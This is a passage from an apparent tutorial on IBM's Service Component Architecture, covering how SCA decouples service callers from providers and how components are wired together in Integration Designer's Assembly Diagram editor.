bet) { cout << "Please enter fewer chips than you have.\n"; cout << "Place your bet\n"; cin >> bet; } srand( time( NULL ) ); pDraw(); dDraw(); pDraw(); dDraw(); while (YN == 1) { if (pHand < 21) { cout << "Would you like another card?\n 1.Hit me \n 2.Stay \n"; cin >> YN; cout << endl; } if (pHand == 21) { cout << "Winner! Winner! Chicken dinner!\n\n"; YN=2; Win=1; } if (pHand >= 22) { cout << "Player busts. Dealer wins\n\n"; pHand=0; YN=2; Win=2; } if (YN == 1) { cout << "Very well\n"; pDraw(); } if ((YN != 1) && (pHand != 0) && (pHand != 21)) { while (dHand <= 17) { dDraw(); } if (dHand == 21) { cout << "Dealer has BlackJack Dealer wins.\n\n" ; Win=2; } if ((dHand >= 22) && (dHand != 21)) { cout << "Dealer busts. Player wins\n\n"; dHand=0; Win=1; } if ((dHand != 0) && (pHand !=0) && (dHand != 21) && (pHand != 21)) { if (pHand<dHand) { cout << "Dealer wins.\n\n"; Win=2; } if (pHand>dHand) { cout << "Player wins.\n\n"; Win=1; } if (pHand==dHand) { cout << "Game ends in tie.\n\n"; } } } } if (Win == 1) { Chips = Chips + bet; } if (Win == 2) { Chips = Chips - bet; } cout << "You have $" << Chips << " in chips.\n" ; Ace=0; Win = 0; dHand = 0; pHand = 0; YN = 1; cout << "Would you like to play again?\n 1.Yes\n 2.No\n"; cin >> Play; if ((Chips <= 0) && (Play == 1)) { Play = 2; cout << "Sorry, but you are out of chips.\n"; } } cout << "Thank you for playing!\n"; system ("pause"); return 0; } lenghty, isn't it?:icon_eek:
https://www.daniweb.com/programming/software-development/threads/159464/blackjack-problem
CC-MAIN-2017-26
refinedweb
483
89.38
So basically I want to be able to detect if my capsule collides with my sphere. Right now it just isn't working. Here is the script I place on the sphere: public GameObject ParticlePrefab; void OnTriggerEnter(Collider col){ Debug.Log("Hit"); Destroy(col.gameObject); Instantiate(ParticlePrefab, transform.position, transform.rotation); } For some reason it never does any of this when the capsule collides with it. I have the capsule as a Rigidbody and a trigger, so I can't think of a reason why this won't work. Any help would be appreciated. Answer by Infamous911 · Jul 26, 2011 at 07:43 PM Ok the problem was that I never actually applied the rigidbody properly. Thanks for the help! Answer by Giometric · Jul 25, 2011 at 08:49 PM Is the Sphere that this script is on also a trigger? edit: actually the example code for C# does have some stuff not present in your script. using UnityEngine; using System.Collections; public class example : MonoBehaviour { void OnTriggerEnter(Collider other) { Destroy(other.gameObject); } } I'm not a C# user myself but it might just need those first few extra lines and also the "public class example" part before it will work at all. I think as long as one of them is a trigger, OnTriggerEnter() gets called on both. Yeah, I remembered that right after posting hehe, quickly edited with a better answer :P Yes I have that, I just edited out all of the other stuff so that you could see the script that was associated with the problem. Answer by Infamous911 · Jul 25, 2011 at 08:52 PM No but I tried that and it doesn't change anything. Answer by Giometric · Jul 25, 2011 at 09:53 PM Ok I went ahead and replicated the scene you described, and it seems to be working fine. This is what the entire script I have looks like: using UnityEngine; using System.Collections; public class test2 : MonoBehaviour { public GameObject ParticlePrefab; void OnTriggerEnter(Collider col){ Debug.Log("Hit"); Destroy(col.gameObject); //Instantiate(ParticlePrefab, transform.position, transform.rotation); } } Though as you can see I commented out the Instantiate part, the Debug.Log part is definitely working. So I'm not sure what's going on with yours.. my scene is using a simple Unity sphere and capsule, the sphere has the script on it, and the capsule has a rigidbody applied and nothing else. Are you using a character controller on your capsule? Can you show me how you're applying the Rigidbody? Maybe that has something to doTrigger event when colliders are already touching eachother 1 Answer Help with destroying objects on collision 2 Answers Colliding two GameObjects 1 Answer Trigger Spawning? 1 Answer How do I ignore trigger objects for collision? 0 Answers
https://answers.unity.com/questions/148323/collision-problem-in-c.html
CC-MAIN-2019-35
refinedweb
463
64.91
Log in to like this post! XamDataGrid 101, Part 1 - Blend-Savvy Overview [Infragistics] Curtis Taylor / Monday, August 16, 2010 The premier control of the WPF NetAdvantage suite is definitely the XamDataGrid. The Infragistics data grid trumps all similar type of controls everywhere. Not only do I get paid to say that, but as a user of our controls I have found the XamDataGrid to be fast, highly customizable, and fast (which is worth repeating). <smile> Since the grid is highly customizable, there are many parts of the object model you can approach for styling and formatting. I am going to cover some of the more popular ways to customize the grid. Creating a Sample Project Clearly, the coolest thing about the XamDataGrid is how intelligently it will format data for you. Simply bind a collection to the grid and it will extract data fields from properties and assign editors with default formatting. To illustrate this point, let’s create a WPF 4.0 project in Expression Blend with sample data and bind the sample data to the XamDataGrid. Create a new WPF Application project in Expression Blend 4. For this project it is important to make sure that you choose .NET version 4.0. For part of this project we will be using the XamColorPicker control which is one of the new 4.0 controls in NetAdvantage. I’ve named my test project XDG101. Next add resources to NetAdvantage for WPF. Right-click on the References folder in the Project panel. In Blend you will need to navigate to the folder which contains the DLL for the assemblies. Navigate to the Program Files folder and locate the Infragistics\NetAdvantage 2010.2 folder. Within this folder there are two folders we must refer to: Both the WPF and the WPFCommon folders contain DLLs we will be using. Note that the WPFCommon folder is there to faciliate common DLLs shared with the WPF Data Visualization version of NetAdvantage. In the WPFCommon\Bin folder add the “InfragisticsWPF4.v10.2.dll” to the project References. Return to the Add References dialog and add the following DLLs from the WPF\CLR4.0\Bin folder: InfragisticsWPF4.Controls.Editors.XamColorPicker.v10.2.dllInfragisticsWPF4.DataPresenter.v10.2.dllInfragisticsWPF4.Editors.v10.2.dll Now from the Data panel in Blend add data to the project to be used at run time. This time I am adding the data to “This document” which will add the instantiation of the data source to the main window rather than to the application. On adding sample data, by default a Collection is added composed of a class that contains two properties. The first property should be a string with Lorem ipsum formatting. Leave this property as is except click on the name of the property to rename the property to ‘ProductName’. The second default property should already be a Boolean type. Rename this property to ‘ForSale’. Next click on the Plus icon button to the right of the Collection in the Data panel to add another property. Clicking on the button will add a default String property. Rename the property ‘Icon’. To the right of the property you can customize the type and formatting. Change the newly added property to be Type Image. On changing to type Image leave the Location field blank. This will cause Blend to add sample images to the project for you. With Location you can add a folder of your own Images to the data. Next add a property named ID of Type Number of Length 4. Next add a property named ColorKey of Type String, Format Colors. Finally, add a property named Price of Type Number and Length 2. Next we will add an instance of the XamDataGrid to main layout of the Main Window. You can quickly locate the XamDataGrid by using the search field in the Assets panel. Double click on the XamDataGrid in the Assets list or drag it into the design space for the window. Blend will position the element on adding it by setting certain Layout properties. To make the XamDataGrid fill the entire Window, reset all properties in the Layout category of the Properties panel. Reset is an option in the Advanced Layout menu which will clear a property to its default setting. The Advanced Layout menu is accessed by clicking on the rectangle to the right of every property. To assign the data to the XamDataGrid, select the control in the Objects and Timeline panel and locate the DataSource property in the Content category of the Properties panel. Access the DataSource Advanced Layout menu and choose the Data Binding option. In the subsequent Create Data Binding dialog we will assign the Collection to the binding expression. This is located in the Data Field tab. After selection the Collection and closing the dialog, you will find the XamDataGrid populated with the data we created. Data Formatting Next I will illustrate a few things you can do to customize the formatting for the data. First of all notice the labels for each header how they match the property names. We will want to override the text for the labels. We will want to override the width and height of the icon. We will move the icon to be the first field in the grid. We will remove the floating decimal numbers on the ID field. We’ll format the Price number field as currency. And finally we’ll assign the XamColorPicker element to be the editor for the ColorKey field. To override how the fields are generated we will need to disable the XamDataGrid AutoGenerateFields feature. This property is located in the FieldLayoutSettings property on the data grid. In the properties panel locate FieldLayoutSettings (should be in the Behavior category). Clicking on the New button next to this property will add an instance of this property which we can customize. Blend will expand to show the properties in FieldLayoutSettings. Here locate and check off the AutoGenerateFields property. Next we will need to add a custom FieldLayout which will define how each field will appear in the XamDataGrid. In Properties locate the FieldLayouts (Collection) property (which should be in the Miscellaneous category). Clicking on the button with the ellipse will display a dialog which will prompt us to add an instance of a FieldLayout. In the FieldLayout Collection Editor dialog add on instance of a FieldLayout. In the properties for the added FieldLayout you will find a Fields Collection property. Click on the Fields Collection button to bring up the Field Collection Editor dialog. Here we will be adding a Field for each property in our data source. Clicking on the ‘Add Another Item’ button will invoke the Select Object dialog. Here you can choose between adding a Field or an Unbound Field. As the name implies Unbound Fields are for adding Fields that are not derived from a property from the data source directly. Add a Field object. A Field will show up in the Field Collection Editor dialog with properties for that Field appearing on the right of the dialog. Here is where we can make the first field point to the Icon property. To do this we must assign the Field Name property to match the name of the property from the bound data. Type the work ‘Icon’ in the Name field. We don’t need a Label for the icon image, so type a space in the Label field. Finally, to limit the width and height of the icon, type 30 in both Width and Height fields. To add and customize the next field, we will need to “add another item” to the Field Collection Editor. If you hit the OK button and closed the editor, simply click on the Fields ellipse button again in the FieldLayout Collection Editor dialog. Add a new Field. The next field we will assign the ProductName property to. Since ProductName needs to be separated by a space to be more human friendly, assign ‘ProductName’ to the Field Name property and ‘Product Name’ to the Label property. Also set the Width of this property to ‘160’. Add a third Field and set the following properties: Name: ‘ForSale’Label: ‘For Sale’Width: ‘70’ Add a fourth Field with the following properties: Name: ‘ID’Label: ‘ID’Width: ‘60’ Add a fifth Field with the following properties: Name: ‘ColorKey’Label: ‘Color Key’ Finally, add the last Field with the following properties: Name: ‘Price’Label: ‘Price’Width: ‘70’ Press OK on both dialogs to close them both. Build or run the project and you will see the grid update with the new field layout. The following is the XAML which Blend generated for us: Editor Formatting To finish the formatting, we will need to add a few styles. To create styles with Expression Blend, you need to have an instance of the type of object you wish to style. This is problematic when the object you wish to style already exists in a context which Blend does not provide access to. For example, the XamDataGrid instantiates XamEditor derivations for each field type. Since the instance is implicitly assigned, Blend will not allow us to create a style for one of these editors since there is no explicit instance Blend can reference. To work around this you can either create the style in the XAML text editor or temporarily add an instance of the type of editor you wish to style, create the style for the editor, remove the temporary instance of the editor then assign the style to the XamDataGrid Field. We will do the latter. Make sure the LayoutRoot in the Objects and Timeline panel is selected before proceeding. In Assets search type XamNumericEditor and double-click on the editor control to add it to the Window. With the temporary XamNumericEditor selected in Objects and Timeline, select the Object -> Edit Style -> Create Empty menu item from the top menu bar. In the subsequent Create Style Resource dialog name the style ‘NumericEditorIDStyle’ and make sure to add it to the current document. Blend will place the designer into Style editing mode. In this mode, any change to a property will become a Setter in the current style. To format the XamNumericEditor to not show numbers after the decimal point, we will want to assign a mask to the Mask property. Type ‘nnnnn’ in the Mask property. Click on the Return Scope button to exit Style editing mode. Now that we have our style, we don’t need the XamNumericEditor. Delete the XamNumericEditor element in the Objects and Timeline panel. However, we have the style which was added to the Resource Dictionary of the Window. To apply the style, we will need to assign it to the Field.Settings.EditorStyle property for the ID field. To return to this editor, click on the XamDataGrid FieldLayouts (Collection) property ellipse button, click on the Fields (Collection) ellipse button in the FieldLayout Collection Editor dialog, select the fourth Field in the Field Collection Editor dialog, and click on the New button next to the Setting property for the ID field. Settings will expand to show additional settings properties for that field. Locate the EditorStyle property. In the Advanced Options for EditorStyle, the Local Resources option is disabled (with this version, this may be fixed in a future version), so instead we will add a custom expression. In the Custom Expression popup dialog add the following text: {StaticResource NumericEditorIDStyle} This should apply the formatting to the ID field immediately. To apply currency formatting to the Price field, we simply need to change the Editor Type from XamNumericEditor to XamCurrencyEditor. This change will be made in similar fashion as the ID field except we will not need a style. Before we can do this, we will need a reference to the mscorlib assembly namespace. The following instruction is the only instruction where you must switch to the XAML editor. Add the following text to the Window tag in the XAML editor: xmlns:sys="clr-namespace:System;assembly=mscorlib" As you might imagine, I now have two feature requests for Expression Blend: the ability to add references to namespaces and the ability to add a Style to any type of object. Return to the design editor, and open the Price Field properties by returning the the XamDataGrid FieldLayouts, Fields dialogs. The last Field is the Price Field. Click on the New button for Settings. In the Settings properties locate EditAsType and in its Advanced Options add the following text to the Custom Expression option: {x:Type sys:Decimal} Finally, add the following custom expression to the advanced options for the property EditorType: {x:Type igEditors:XamCurrencyEditor} The following XAML will be generated from the two added custom expressions: On pressing OK on the two dialogs the Price field will update to display current locale formatted currency. CellValuePresenter DataTemplate Override The final change we will make to customize the formatting for the grid is the ColorKey field. Here we will create a CellValuePresenter Style which will contain a DataTemplate definition. The DataTemplate will bind the ColorKey value to the SelectedColor property on the XamColorPicker control. If you refer to Infragistics documentation for creating a CellValuePresenter Style you will find various XAML examples. Once again, this is another scenario where Blend cannot create this style from scratch without a little help as the CellValuePresenter is another object which is created behind the scenes for every field. The CellValuePresenter defines how the value for each cell is presented within the UI of the XamDataGrid Record. Additionally, since the XamDataGrid will always instantiate instances of this control, this element is not added to the XML that Blend reads to know what to display in Assets. To work around these few Blend limitations, we will briefly return to the XAML editor one last time. In the XAML editor, add the following text to the LayoutRoot content (before or after the XamDataGrid block of XAML). <igDP:CellValuePresenter/> On returning to the designer a CellValuePresenter will appear in the Objects and Timeline. Now we have an object that we can style. Select the CellValuePresenter, then in the Object menu on the top menu bar select the ‘Edit Style’ -> ‘Create Empty’ option. Name the style ‘ColorKeyCellStyle’ in the Create Style Resource dialog. To assign a non XamEditor control to the cell value presenter, we will need to create a DataTemplate which hooks up this control. In the Style editor the breadcrumb control at the top of the designer allocates a menu for doing just that. At the top of the designer a control will show a palette menu next to the CellValuePresenter label. This will show all the template editors available for this style. Select the second template editor for editing the ContentTemplate. From here create an empty template. In the Create DataTemplate Resource dialog, add the following style name: ‘ColorCellDataTemplate’. Blend places the designer in edit mode for the DataTemplate. Add the XamColorPicker control from Assets to the DataTemplate Grid. After making sure the XamColorPicker is selected in the Objects and Timeline panel, locate the SelectedColor property from in the XamColorPicker Properties category. Next go to the SelectedColor Advanced Options and choose the Data Binding option. In the Create Data Binding dialog, make sure Data Context tab is selected and add the following text to the ‘Use a custom path expression’ field: Value Also make sure all Layout properties are set to default. Blend will probably set the HorizontalAlignment to Left. This will end with confusing results. So it is important that both Horizontal and Vertical alignments are set to Stretch. Return scope to the Window layout and delete the temporary CellValuePresenter from the LayoutRoot. To assign the style to the ColorKey field, return to FieldLayouts for the XamDataGrid and Fields for the FieldLayout. Select the second to last Field in the Field Collection Editor dialog. Add New Settings for the ColorKey field. Locate the CellValuePresenterStyle property and select Advanced Options. Advanced Options will allow us to select the ColorKeyCellStyle from the Local Resources option. There is one last caveat to work around. Blend always uses the DynamicResource keyword when assigning styles. You may encounter a problem with assigning a CellValuePresenter style using DynamicResource at run time. Since the style is defined locally, we can change DynamicResource to StaticResource. You can do this in the XAML or by simply choosing the Custom Expression option in Advanced Options. Since we already assigned the local resource, the Custom Expression field will show the expression. Here change DynamicResource to StaticResource. Dismiss the open dialogs by pressing OK and run the application. You will find the XamColorPicker displaying the color in the ColorKey field. In the Data panel you can customize the sample data by adding more records. If you elements do not show up, then there may be a type in the XAML or a style was not assigned correctly. If elements show up but are oddly placed, then a Layout property was assigned that needs to be cleared. I’ve attached the project for reference. In spite of a few of the caveats with working with custom styles with Blend, having Blend automate the generation of the XAML limits XAML typos and is useful in that XAML will display properties and event names, and provides specialized editors for working with styles and templates. In my next killer blog I will demonstrate applying styles to override background, highlight and hover brushes for cells, header labels, and row summaries as well as how to override text styles for cells and labels. XDG101.zip
https://www.infragistics.com/community/blogs/b/curtis_taylor/posts/xamdatagrid-101-part-1
CC-MAIN-2022-21
refinedweb
2,928
55.24
Hello, I'm trying to use some methods I'm defining in a module in a model and my rake task. How can I do this? Any help would be appreciated. I've currently got the following, but my rake task can't access the methods in my module. Instead, I get.. undefined local variable or method `report_csv_process' for #<Object:0x284f9e8> /lib/module/order_process module order_process def process_order(id) #do stuff end /lib/tasks/ordering.rake include order_process namespace :send_report do task :order => :environment do process_order(id) end end /app/models/segment.rb class Segment < ActiveRecord::Base include report_csv_process bla bla end on 2009-04-16 00:46 on 2009-04-16 02:06 I was a little off, but still haven't quite figured it out. I currently have: > /lib/module/order_process.rb > module order_process > def process_order(id) > #do stuff > end > > > /lib/tasks/ordering.rake > > include 'order_process.rb' > namespace :send_report do > task :order => :environment do > process_order(id) > end > end > > /app/models/segment.rb > class Segment < ActiveRecord::Base > include 'report_csv_process.rb' > > bla bla > > end I tried removing the single quotes, without luck on 2009-05-04 01:17 Did you ever figure out how to do this? I'm trying to include some module code into a custom rake task and I'm getting the same error. Thanks. on 2009-05-04 07:21 Yep. I had to both require the file then include the module: require 'lib/modules/report_csv_process.rb' include ReportCsvProcess on 2009-05-04 09:44 Did you ever figure out how this is done? I'm stuck on the exact problem (trying to use some custom module code inside a rake task). on 2009-05-04 15:47 Hu? Did you not read my last post? You wrote almost exactly the same questing twice. You have to both require the file, then include the module. ###rake_file.rb require 'lib/modules/your_module_filename.rb' namespace :your_rake_task do include your_module_name #do stuff end
https://www.ruby-forum.com/topic/184401
CC-MAIN-2018-09
refinedweb
324
60.72
The challenge was fairly self explanatory thankfully, a link for a download, a cipher text to crack and an IP / port where a server can be reached: We also see it uses a salt as part of the encryption function and that the salt is not included in the files we downloaded. It imports "SALT" from a python module "grandmaToldMeNotToTalkToBigBadWolf". import hashlib import string from grandmaToldMeNotToTalkToBigBadWolf import SALT DEBUG= False MSGLENGTH = 40000 Cool. Let's create a arbitrary salt file for now so we can see the service in action: root@mankrik:~/bctf/weak# echo SALT=\'abcd\' > grandmaToldMeNotToTalkToBigBadWolf.py root@mankrik:~/bctf/weak# python weak_enc-40eb1171f07d8ebb06bbf36849d829a1.py Let's connect to it and see what happens: root@mankrik:~# nc localhost 8888 Please provide your proof of work, a sha1 sum ending in 16 bit's set to 0, it must be of length 21 bytes, starting with QN+yjqWfMwADrUsv test Check failed Ok before we can even access the encryption server, we have a riddle to solve? We must be able to solve this riddle to proceed to the next level because I have a feeling that, even though we have the full code of the encryption algorithm, without the salt, we will never decrypt the challenge. The only way we're getting the salt is through the live BCTF server. So we need to pass this test. As it turns out, this is a fairly standard riddle used in CTF competitions often. We solve it using a brute force approach using Python itertools module to build every possible combination of characters and test for combinations that meet the requirements. I have reused code from this link with some modifications for our particular circumstances below: proof = puzzlefromserver() The output of the snippet above is a string in the variable "test" that meets the criteria demanded of us by the server. So it's time to start whipping up a client to begin probing our way through the encryption part of this crypto challenge. For this I'm using Binjitsu, which I am still learning and finding great features in every day. The first thing I want to do is just connect, and then pass the riddle and get to the Encryption service. Let's use this code to do that: #!/usr/bin/python from pwn import * import hashlib, itertools # This is the plaintext we are going to encrypt plaintext = 'a' * 1 conn = remote('localhost',8888) #conn = remote('146.148.79.13',8888) task = conn.recvline() line = task.split() proof = line[25] print "Got challenge ("+proof+"). Brute forcing a response..."() print "Responding to challenge..." conn.send(test) conn.sendafter(':', plaintext + "\n") encrypted = conn.recvline() line = encrypted.split() print "Plaintext "+plaintext+" encrypted is "+line[3] conn.close() And when we run it... root@mankrik:~/bctf/weak# python pwnweak.py.p1 [+] Opening connection to localhost on port 8888: Done Got challenge (3REpDAwCe+Mmxb85). Brute forcing a response... Responding to challenge... Plaintext a encrypted is Q0isU8Y= [*] Closed connection to localhost port 8888 Ok cool we're in! And now I have a script I can encrypt anything with. That's step 1. Next we need to figure out a way to approach the deduction of the salt. Let's browse the server code some more. def LZW(s, lzwDict): # LZW written by NEWBIE for c in s: updateDict(c, lzwDict) print lzwDict # have to make sure it works result = [] Notice here we have a LZW function which is a lossless compression algorithm. Whether this algorithm implements true LZW or not is not important. What is important is that it's a compression algorithm (presumably) and that's cool because compression gives us interesting results when encrypting. The idea I'm using here, is that, when you add a salt to a plaintext and compress them before encryption, if the plaintext and the salt have common factors then the ciphertext will be of a unexpected, and shorter, length. Let's take this oversimplified example: - Case #1 - Salt: beef - Plaintext: aaaaaa - Ciphertext: AzTzDa - Case #2 - Salt: beef - Plaintext: eeeeee - Ciphertext: TrZw We try this in our "lab" environment by modifying our Python code with a for loop, from the server code we know that the salt can only contain lowercase letters a-z because it checks that, so that's cool. Let's iterate through the characters a-z against our lab where we've configured the salt "abcd" and see what happens! Here's a link to the full code of this version. # iterate through lowercase letters for letter in range(97,122+1): plaintext = chr(letter) * 10 conn = remote('localhost',8888) Then let's run our code against our lab server, I'm only interested in seeing the encrypted results so I'll grep for "encrypted": root@mankrik:~/bctf/weak# python pwnweak.py.p2 | grep encrypted Plaintext aaaaaaaaaa encrypted is Q0isU8aHWYY= Plaintext bbbbbbbbbb encrypted is Q0isU8eHWYY= Plaintext cccccccccc encrypted is Q0isU8SHWYY= Plaintext dddddddddd encrypted is Q0isU8GHWY8= Plaintext eeeeeeeeee encrypted is Q0isU8KGWoc= Plaintext ffffffffff encrypted is Q0isU8KGWoc= Plaintext gggggggggg encrypted is Q0isU8KGWoc= Plaintext hhhhhhhhhh encrypted is Q0isU8KGWoc= Plaintext iiiiiiiiii encrypted is Q0isU8KGWoc= Plaintext jjjjjjjjjj encrypted is Q0isU8KGWoc= Wow check that out. For letters a - d the encrypted output differs but for all other encryptions the ciphertext is the same. So we deduce the salt has the letters a,b,c, and d. Cool. Let's do this against the production server! They can't mind just 26 connections surely! Plaintext gggggggggg encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext hhhhhhhhhh encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext iiiiiiiiii encrypted is NxQ1NDMYcDcw53gfGi8u Plaintext jjjjjjjjjj encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext kkkkkkkkkk encrypted is NxQ1NDMYcDcw53gcGi8u Plaintext llllllllll encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext mmmmmmmmmm encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext nnnnnnnnnn encrypted is NxQ1NDMYcDcw53geGi8u Plaintext oooooooooo encrypted is NxQ1NDMYcDcw53gdGi8u Plaintext pppppppppp encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext qqqqqqqqqq encrypted is NxQ1NDIZcTY/5HkaBS4t Plaintext rrrrrrrrrr encrypted is NxQ1NDIZcTY/5HkaBS4t Excellent, we're making progress. We know a couple of things from this. - We know the salt is much longer than our "lab" salt because the ciphertext is much longer for the same input. - We also know that the sale must contain the letters "i", "k", "o", and "n". All other ciphertexts remain the same. Where to go from here? It is next possible to deduce the position of each byte in the salt by examining the individual bits in the ciphertext output. That is complicated though so is there anything we can do to quickly brute force this? I got the idea from a colleague to assume that the salt fit the basic rules of an English language word and build a list of anagrams using the "ikon" letters, then apply them as salts in the server code until I reached a decryption of a known plaintext that matched a known ciphertext from the production server. So we know: - The string "gggggggggg" encrypts to "NxQ1NDIZcTY/5HkaBS4t". - The salt is > 4 bytes - The salt contains characters i,k,o and n We assume: - The salt is an english word or at least a string that is made up of words following the rules of the english language (i.e. no "ooo" sequences) So I made these modifications to the server code, which basically takes a plaintext from the client, then brute forces every combination of the 15 combinations of 4 letter uses of the letters i,k,o and n I came up with and sends them to the client.: ... def encrypt(m,salt): lzwDict = dict() toEnc = LZW(salt + m, lzwDict) key = hashlib.md5(salt*2).digest() ... print "looking for salts" koala = ('ikon', 'ionk', 'inok','onik','oink','nino','nini', 'niko', 'koni', 'koin', 'kino', 'niok', 'noik','noki','niko',); for findsalt in itertools.product(koala, repeat = 5): salttry = '{}{}{}{}{}'.format(*findsalt) print "Salt: " + salttry encd = encrypt(msg, salttry) print "Encrypted: " + encd req.sendall(salttry + ":" + encd + "\n") ... # This is the plaintext we are going to encrypt plaintext = 'g' * 10 conn.sendafter(':', plaintext + "\n") while True: encrypted = conn.recvline() print "Response: " + encrypted Then we wanna run it until we get a string containing the known good ciphertext we previously retrieved from the production server "NxQ1NDIZcTY/5HkaBS4t". Within 3 minutes we got the following output: root@mankrik:~/bctf/weak# time python pwnweak.py.p3 | grep NxQ1 Response: inokonikniokonikoink:iJykNxQ1QNqCzMLoilrI580hIg== Response: niniinokniniionkikon:Q3LUXv0lUVNxQ1dZV1WUYF9W Response: nikonikoninikonikoni:NxQ1NDIZcTY/5HkaBS4t Congrats, we now know the salt used to encrypt on the production server is "nikonikoninikonikoni". This is step 2 done! This challenge is not solved yet though. We have a message to decrypt next. So taking what we know now, how can we apply this to decryption? I first thought to analyse the encryption and compression functions but before I got too far I noticed just how closely the encrypted versions of the long strings of n, i, k, and o matched the decryption challenge. For example, from earlier we know: - Challenge ciphertext: NxQ1NDMYcDcw53gVHzI7 - 10 n's ciphertext: NxQ1NDMYcDcw53geGi8u - 10 letters not in the list i,k,o,n: NxQ1NDIZcTY/5HkaBS4t Notice that the ciphertext for letters in the list i,k,o,n are correct until the last 5 bytes of the challenge ciphertext. Can we apply our salt brute force technique to the challenge to result in a quick win? Firstly, let's set our server code back to "stock" and configure our SALT correctly now that we know it. Next we'll modify the client code to again, use a loop to continuously ask our localhost server to encrypt values. This time our plaintext will iterate through blocks of 4 characters we used previously to find the salt. You can view the client code we used at this link. We started with a ciphertext of 4 bytes, then increased it in blocks of 4 bytes until we had this code which looked for 12 byte plaintexts: You can view the client code we used at this link. We started with a ciphertext of 4 bytes, then increased it in blocks of 4 bytes until we had this code which looked for 12 byte plaintexts: import hashlib, itertools # list of combinations of plaintext possibly pool = ('ikon', 'ionk', 'inok','onik','oink','nino','nini', 'niko', 'koni', 'koin', 'kino', 'niok', 'noik','noki','niko',); # iterate through the combinations for findsalt in itertools.product(pool, repeat = 3): plaintext = '{}{}{}'.format(*findsalt) conn = remote('localhost',8888) When run, we received a result in just over 2 minutes. We confirmed the string NxQ1NDMYcDcw53gVHzI7 is the result of encrypting the plaintext "nikoninikoni". root@mankrik:~/bctf/weak# date; python pwnweak.py.p4 | grep NxQ1NDMYcDcw53gVHzI7 Monday 23 March 20:28:18 AEDT 2015 Plaintext nikoninikoni encrypted is NxQ1NDMYcDcw53gVHzI7 ^C root@mankrik:~/bctf/weak# date Monday 23 March 20:30:35 AEDT 2015 Woot. That's the third and final step to this challenge. We submit the flag and get the 200 points. A good challenge with many new steps for me, use of deduction and brute force together was very fun. Thanks to BCTF team. Writeup: Dacat
http://capturetheswag.blogspot.jp/2015/03/bctf-2015-weakenc-crypto-challenge.html
CC-MAIN-2017-39
refinedweb
1,810
61.67
Service Component Architecture Service Component Architecture (SCA) is a framework for solving one of the most basic issues relating to building distributed SOA applications. Imagine you have an external application that exposes itself as a callable service. You now wish to write a new application that calls the external service. How do you go about doing this? You could look at how the external application is to be called and you will find that it will be likely be Web Services, JMS, MQ, REST, EJB or some similar technology. You could then code your new application using the correct API and all will work. Well … it will work for a time. You have introduced a hard dependency here. You have bound your application to a specific protocol and associated endpoint for the remote application you are calling. If the nature of the service provider application changes such as its location, its communication protocol or its parameters, then the service caller will also need to be reworked. This means that the coupling between the caller and the provider is tight. Given that it is our desire to be loosely coupled and agile to change, maybe we can do better. At its most simplistic level, SCA provides an abstraction between a service caller and a service provider. The service caller doesn't actually care about how the provider is called only that when it is time to invoke the services of the provider that the provider is then called. SCA provides just such a loose coupling. Instead of the service caller invoking the service provider directly, the service caller asks SCA to invoke the service provider. In turn, SCA then makes the actual call to the service provider using the the configured protocol, endpoints and parameters. At first glance, this doesn't appear to solve any problems … but if we look closer we something wonderful has happened. The service caller which is customer written logic now no-longer needs to know mechanical information about the service provider. Instead, the caller asks SCA and SCA does the work on behalf of the caller. At the SCA level, the binding of protocols and endpoints are configured at a very high level without coding. Importantly, if the details of the service provider change, the service caller application (which if we remember, is business logic) is unaffected. Only the binding details at the SCA level need to be reworked. The question now becomes one of how to actually use this SCA concept. I'll start by saying that SCA is rich in function. This means that there is a lot of stuff in there. However, try not to let the Boeing 747 cockpit array of levers and switches deter you from realizing the benefits. We will take it slowly and carefully and expose the parts that are needed as when we need them. Let us start with what SCA actually is from a product perspective. SCA is a runtime framework that separates callers from called services. A caller no longer calls the target service directly but instead asks SCA to call the service on its behalf. To achieve this a "proxy" is put in place of the target service. This proxy is configured with the actual knowledge of how to invoke the real target service. The proxy is identified with a name. When the caller wishes to invoke the target service, it asks SCA to invoke the target by passing in the name of the proxy. We have thus decoupled the caller from the target service provider. Somewhere the rubber must meet the road and some definitions have to be made. SCA asks for these definitions as an XML document that describes/declares the definitions. The format of the XML is defined as an XML Schema and conforms to an SCA specification called the Service Component Definition Language (SCDL). Thankfully, this XML is merely an academic part of the story as we will never see it. I explain it here only for your understanding. The SCA XML is (for our discussion purposes) interpreted at run time. When a caller says that it wishes to invoke a service with a name of "XYZ", the SCA runtime will parse the XML looking for the definition of "XYZ". This definition will include such things as what protocol to use to connect to the back-end service, where the service is located and a host of additional (an optional) attributes. I mentioned that we will never have to work with the SCA XML directly, so how then do we describe the environment we wish to achieve to SCA? The answer to this is to use the IBM development environment called Integration Designer (ID). Integration Designer is a full IDE previously called WebSphere Integration Developer (WID). It is based on Eclipse and looks familiar to other Eclipse based products. Within ID, we create modules which are really projects. Each module contains a description of a single SCA environment, the piece parts that are to be integrated and details of how those parts are configured together. The description of the SCA environment is called the Assembly Diagram. ID provides a dedicated editor for creating and modifying the contents of this diagram. Imaginatively, the editor is called the Assembly Diagram Editor. Using this visual editor the relationship between components can be wired together. As you may have already guessed, the diagram is basically a visual representation of the SCA XML document that is used to control SCA operations. The Assembly Diagram Editor is rich enough that users need never edit the raw XML files by hand. In fact, ID goes out of its way to hide those from you so that all you ever see is the assembly diagram. The Assembly Diagram can be opened from the module view. Once opened, a drawing canvas can be seen which shows the diagram area: This is the mechanical aspect of working with SCA, now we turn our attention to the things that can be wired together on that canvas. Experience has taught me that this can be one of the more subtle concepts to get across, so we will take our time here. Within the SCA story there are basically two types of things that can be described. One type is code that will actually run on and within IBPM. This includes BPEL processes, Java code, and a variety of other goodies we have not yet had a chance to discuss. To help set the scene, imagine that we want to code a fragment of Java that will execute inside IBPM and that we want this Java code to call an external service. The Java code will be written and contained inside what SCA calls a component. A component is a unit of thing that is self contained and acts as a place holder for its implementation. From an SCA perspective, a finite set of SCA component types are available. Specifically, these are: We won't go into details on each of the component types here. Instead, there will be much written on them in subsequent sections. For now, let us simply realize that components are building blocks in the SCA diagram. As an illustration, let us look at a Java Component. When added to the canvas area, it looks as follows: Each of the component types has a unique icon associated with it. Every SCA component has a name that is unique to the module in which it lives. In this example, the component is called MyJavaComponent. On the Assembly Diagram, the visual box that is the component can be thought of as a container or holder for its actual content. We can drill down into a component to see what is inside it. In this instance, if we open it up, we would see Java code. If we had a BPEL process, we would 